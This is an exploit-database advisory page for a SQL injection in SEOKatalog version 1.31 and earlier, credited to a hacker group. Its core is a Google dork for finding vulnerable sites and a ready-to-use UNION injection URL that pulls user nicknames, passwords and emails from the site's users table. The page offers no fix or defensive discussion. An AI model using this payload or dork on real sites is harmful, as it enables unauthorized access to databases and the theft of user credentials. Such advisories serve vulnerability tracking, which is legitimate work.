SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability

2012.06.04
Credit: Smugller
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################# # SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability # ################# # Exploit Title: SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability # # Version: <= 1.31 # # Vendor: http://www.seokatalogi.pl/ # # Category: webapps # # Date: 08.09.2011 # # Author: Smugller # # Contact: smugll3r[alt+64]gmail.com # # Group: DevilTeam # # Website: http://devilteam.pl # # From: Poland # # Google Dork: intext:"Powered by SEOKatalog 1.31" # ################# # Exploit: http://site.com/index.php?action=site_cat&cat=&id_site=&id=-1+union+all+select+1,2,3,4,5,6,7,8,9,group_concat(0x3c62722f3e,nick,0x3a,pass,0x3a,email,0x3c62722f3e),11,12+from+seokat_users--

References:

http://devilteam.pl
http://www.seokatalogi.pl/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top